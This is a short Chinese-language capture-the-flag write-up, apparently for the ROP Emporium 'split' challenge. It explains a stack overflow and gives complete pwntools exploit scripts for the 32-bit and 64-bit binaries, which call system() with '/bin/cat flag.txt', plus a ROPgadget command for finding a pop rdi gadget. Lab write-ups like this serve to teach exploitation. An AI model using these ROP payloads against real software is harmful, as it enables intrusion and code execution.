32位
日常checksec,开了NX
ida,f5,发现溢出点与 ret2win 相同
程序中少了可以直接利用的函数,但可以找到 system() 和字符串 /bin/cat flag.txt
思路:将 /bin/cat flag.txt 作为参数通过栈传入 system() 函数再进行调用
在 ida 中分别找到 system 和 /bin/cat flag.txt 的地址
exp
#!/usr/bin/env python
#-*-coding:utf-8 -*-
from pwn import *
sh = process('./split32')
system = 0x08048657
cat_flag = 0x0804A030
payload = 'A' * 0x28
payload += p32(0)
payload += p32(system)
payload += p32(cat_flag)
sh.sendline(payload)
sh.interactive()
64位
思路与32位一致
在 ida 中分别找到 system 和 /bin/cat flag.txt 的地址
由于是64位程序,传入的第一个参数放在寄存器 rdi 中而不是直接入栈,所以需要通过 ROPgadget 找到 rdi 的地址
ROPgadget --binary split --only 'pop|ret'
exp
#!/usr/bin/env python
#-*-coding:utf-8 -*-
from pwn import *
sh = process('./split')
system = 0x00400810
cat_flag = 0x00601060
pop_rdi = 0x00400883
payload = 'A' * 0x20
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(cat_flag)
payload += p64(system)
sh.sendline(payload)
sh.interactive()
32位程序参数直接入栈
64位程序参数先传入寄存器
64位6个寄存器:rdi, rsi, rdx, rcx, r8, r9
